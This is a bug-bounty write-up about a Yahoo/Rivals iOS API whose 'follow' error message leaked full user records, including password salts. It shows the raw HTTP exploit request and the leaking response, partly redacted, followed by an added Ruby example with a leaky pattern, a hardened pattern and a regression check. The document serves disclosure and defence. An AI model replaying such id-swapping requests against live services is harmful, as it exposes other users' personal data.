Story about a leak of more than 3.5 million users' PII in Yahoo!!! (using an iOS app) Bug worth $9,500

POST /api/v1/user/3123911/follow HTTP/1.1
Accept: application/json
Content-Type: application/json
Accept-Encoding: gzip, deflate
Connection: close
If-None-Match: XXXXxxxXXXXX
Cookie: _rivalry_session_v2=XXXXXxxxxXXXXXX
Authorization: token XXXXXxxxxxXXXXXX
Content-Length: 33
Accept-Language: en-us

{"follow":{"type":"Site","id":1}}

HTTP/1.1 422 Unprocessable Entity
Cache-Control: max-age=0
Content-Type: application/json; charset=utf-8
Date: Sun, 07 Nov 2021 15:55:44 GMT
Expires: Sun, 07 Nov 2021 15:55:44 GMT
Referrer-Policy: no-referrer-when-downgrade
Server: ATS
Set-Cookie: _rivalry_session_v2=XXXXXXXxxxxxXXXXXX
Status: 422 Unprocessable Entity
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
x-ittl: 0:15m
X-Permitted-Cross-Domain-Policies: none
X-Powered-By: Phusion Passenger(R)
x-pver: 2.85A
X-Request-Id: XXXXxxxxxXXXXX
X-Runtime: 0.015939
X-XSS-Protection: 1; mode=block
Age: 0
Connection: close
Expect-CT: max-age=31536000, report-uri=""
Content-Length: 1124

{"message":"not allowed to follow? this #\u003cUser id: 3123XXX, email: \"\", username: \"VictimName\", terms_and_conditions_accepted_at: \"2021-04-08 23:06:11\", created_at: \"2021-04-08 23:06:11\", updated_at: \"2021-07-25 22:41:56\", braintree_customer_id: nil, role: \"user\", legacy_password_hash: nil, first_name: \"victim\", last_name: \"bicharaBabu\", phone_number: nil, legacy_guid: nil, legacy_id: nil, legacy_password_changedate: nil, comped_all_sites: false, rivals_emails: nil, third_party_emails: nil, banned: false, title: nil, affiliated_site_id: 25, incentive_mail_send_count: 0, email_opt_out_date: nil, comp_all_sites_until: nil, obi_instrument_id: \"9659xxxx\", salt: \"XXXXXXXXXxxxxxxXXXXX\", guce_tos_record: [], accepted_events: nil, is_analyst: nil, obi_customer_id: \"rivalscom-0a6285910d26XXXXxxxxXXX\", inappropriate_username: false, refer_friend_id: nil, inappropriate_user_photo: nil, user_login_token: nil, login_token_valid_until: nil, saved_from_cancellation: nil, compromised: nil, forecast_ban: nil, customer_support_admin_expiration_date: nil\u003e"}
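The 422 body above is the classic mistake of interpolating the whole model object into an error message, so every column of whichever user id the caller names (including the password salt) comes back in the response. The following Ruby example is added here and is not code from the Rivals application; the User model, its columns and the sample record are constructed stand-ins. It contrasts the leaky pattern with a message that carries only the id, and adds a check that flags ActiveRecord-style attribute dumps in any error body so a test suite can catch a regression.

```ruby
require 'json'

# Constructed stand-in for an ActiveRecord model: ActiveRecord#inspect renders
# every column in the form "#<User id: 1, email: \"...\", salt: \"...\">",
# which is exactly what showed up in the leaked 422 message.
User = Struct.new(:id, :email, :salt, :first_name, :role) do
  def inspect
    fields = to_h.map { |k, v| "#{k}: #{v.inspect}" }.join(", ")
    "#<User #{fields}>"
  end
end

# Constructed sample record; none of these values are real.
TARGET = User.new(3123911, "victim@example.invalid", "s4ltS4lt", "victim", "user")

# Vulnerable pattern: the error text embeds the model object itself, so the
# API reflects every column of an arbitrary user id back to the caller.
def leaky_follow_error(user)
  { "message" => "not allowed to follow? this #{user.inspect}" }.to_json
end

# Hardened pattern: only the opaque id reaches the client; any detail needed
# for debugging belongs in server-side logs, not in the response body.
def safe_follow_error(user)
  { "message" => "not allowed to follow user #{user.id}" }.to_json
end

# Regression check for error bodies: returns the column names of any
# ActiveRecord-style object dump found in the "message" field, or [] if clean.
DUMP_RE = /#<(\w+) ([^>]*)>/
def leaked_columns(body)
  msg = JSON.parse(body)["message"].to_s
  m = DUMP_RE.match(msg)
  return [] unless m
  m[2].scan(/(\w+): /).flatten
end

if __FILE__ == $PROGRAM_NAME
  puts "leaky:  #{leaked_columns(leaky_follow_error(TARGET)).inspect}"
  puts "safe:   #{leaked_columns(safe_follow_error(TARGET)).inspect}"
end
```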


Bug Reported: Nov 7th (4 months ago)


Guys, I am excited to announce that after 7 years, Yahoo has now opened up a process for public disclosure! Guys, this is the first write-up to get official permission from Yahoo!! #loveYahoo

Some of the helpful Links:





Security Researcher | works @vairavtech | Bug Bounty Hunter From 🇳🇵| Your IOS application needs a security service? |